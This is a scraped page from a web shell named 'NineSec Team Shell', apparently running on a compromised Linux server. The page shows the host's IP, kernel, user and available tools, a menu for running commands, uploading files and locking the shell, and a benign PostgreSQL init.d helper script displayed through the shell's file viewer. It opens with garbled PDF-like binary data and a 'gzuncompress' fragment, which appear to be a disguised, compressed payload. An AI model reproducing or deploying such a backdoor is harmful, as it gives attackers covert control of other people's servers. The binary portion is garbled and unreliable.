%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /lib/../usr/../usr/share/postgresql-common/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //lib/../usr/../usr/share/postgresql-common/init.d-functions
# This file contains common functionality for all postgresql server
# package init.d scripts. It is usually included by
# /etc/init.d/postgresql

init_functions=/lib/lsb/init-functions
#redhat# init_functions=/usr/share/postgresql-common/init-functions-compat
. $init_functions

PGBINROOT="/usr/lib/postgresql/"
#redhat# PGBINROOT="/usr/pgsql-"

# do pg_ctlcluster action $1 to all clusters of version $2 with command
# description $3; output according to Debian Policy for init scripts
do_ctl_all() {
    [ "$1" ] || { echo "Error: invalid command '$1'" >&2; exit 1; }
    [ "$2" ] || { echo "Error: invalid version '$2'" >&2; exit 1; }
    [ -d "/etc/postgresql/$2" ] || return 0
    [ "$(ls /etc/postgresql/$2)" ] || return 0
    [ -x "$PGBINROOT$2/bin/postmaster" ] || return 0

    status=0
    log_daemon_msg "$3"
    for c in /etc/postgresql/"$2"/*; do
	[ -e "$c/postgresql.conf" ] || continue
	name=$(basename "$c")

	# evaluate start.conf
	if [ -e "$c/start.conf" ]; then
	    start=$(sed 's/#.*$//; /^[[:space:]]*$/d; s/^\s*//; s/\s*$//' "$c/start.conf")
	else
	    start=auto
	fi
	[ "$start" = "auto" ] || continue

        log_progress_msg "$name"
	set +e
	if [ "$1" = "stop" ] || [ "$1" = "restart" ]; then
	    ERRMSG=$(pg_ctlcluster --force "$2" "$name" $1 2>&1)
	else
	    ERRMSG=$(pg_ctlcluster "$2" "$name" $1 2>&1)
	fi
	res=$?
	set -e
	# Do not fail on success or if cluster is already/not running
	[ $res -eq 0 ] || [ $res -eq 2 ] || status=$(($status || $res))
    done
    if [ $status -ne 0 -a -n "$ERRMSG" ]; then
	log_failure_msg "$ERRMSG"
    fi
    log_end_msg $status
    return $status
}

# create /var/run/postgresql
create_socket_directory() {
    if [ -d /var/run/postgresql ]; then
	chmod 2775 /var/run/postgresql
    else
	install -d -m 2775 -o postgres -g postgres /var/run/postgresql
	[ -x /sbin/restorecon ] && restorecon -R /var/run/postgresql || true
    fi
}

# start all clusters of version $1
# output according to Debian Policy for init scripts
start() {
    do_ctl_all start "$1" "Starting PostgreSQL $1 database server"
}

# stop all clusters of version $1
# output according to Debian Policy for init scripts
stop() {
    do_ctl_all stop "$1" "Stopping PostgreSQL $1 database server"
}

# restart all clusters of version $1
# output according to Debian Policy for init scripts
restart() {
    do_ctl_all restart "$1" "Restarting PostgreSQL $1 database server"
}

# reload all clusters of version $1
# output according to Debian Policy for init scripts
reload() {
    do_ctl_all reload "$1" "Reloading PostgreSQL $1 database server"
}

status() {
    CLUSTERS=`pg_lsclusters -h | grep "^$1[[:space:]]"`
    # no clusters -> unknown status
    [ -n "$CLUSTERS" ] || exit 4
    echo "$CLUSTERS" | awk 'BEGIN {rc=0; printf("Running clusters: ")} {if (match($4, "online")) printf ("%s/%s ", $1, $2); else rc=3} END { printf("\n"); exit rc }'
}

# return all installed versions which do not have their own init script
get_versions() {
    versions=''
    local v dir skipinit

    skipinit=continue
    #redhat# skipinit=true # RedHat systems will have /etc/init.d/postgresql-* provided by the yum.pg.o package
    dir=$PGBINROOT
    #redhat# dir="-d /usr/pgsql-*"

    for v in `ls $dir 2>/dev/null`; do
        #redhat# v=${v#*-}
        [ -x /etc/init.d/postgresql-$v ] && $skipinit
        if [ -x $PGBINROOT$v/bin/pg_ctl ]; then
	    versions="$versions $v"
	fi
    done
}

NineSec Team - 2022